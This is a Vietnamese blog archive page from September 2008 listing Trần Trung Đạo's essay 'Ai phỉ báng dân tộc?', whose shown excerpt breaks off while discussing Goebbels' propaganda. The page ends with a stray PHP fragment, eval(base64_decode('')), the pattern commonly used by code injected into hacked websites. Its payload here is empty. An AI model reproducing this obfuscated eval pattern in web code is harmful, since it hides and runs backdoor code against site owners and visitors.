Archive for September 29th, 2008

Trần Trung Đạo: Ai phỉ báng dân tộc?

Trần Trung Đạo: Ai phỉ báng dân tộc?

Joseph Goebbels, Bộ trưởng Tuyên truyền của Đức Quốc xã, được xem như là một trong những người áp dụng thành công nhất kỹ thuật vận động quần chúng, có lần đã chỉ thị cho các cán bộ tuyên truyền của Đảng Quốc xã Đức không n

09.29.2008 | Tiểu Luận- Chính Luận |

10 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>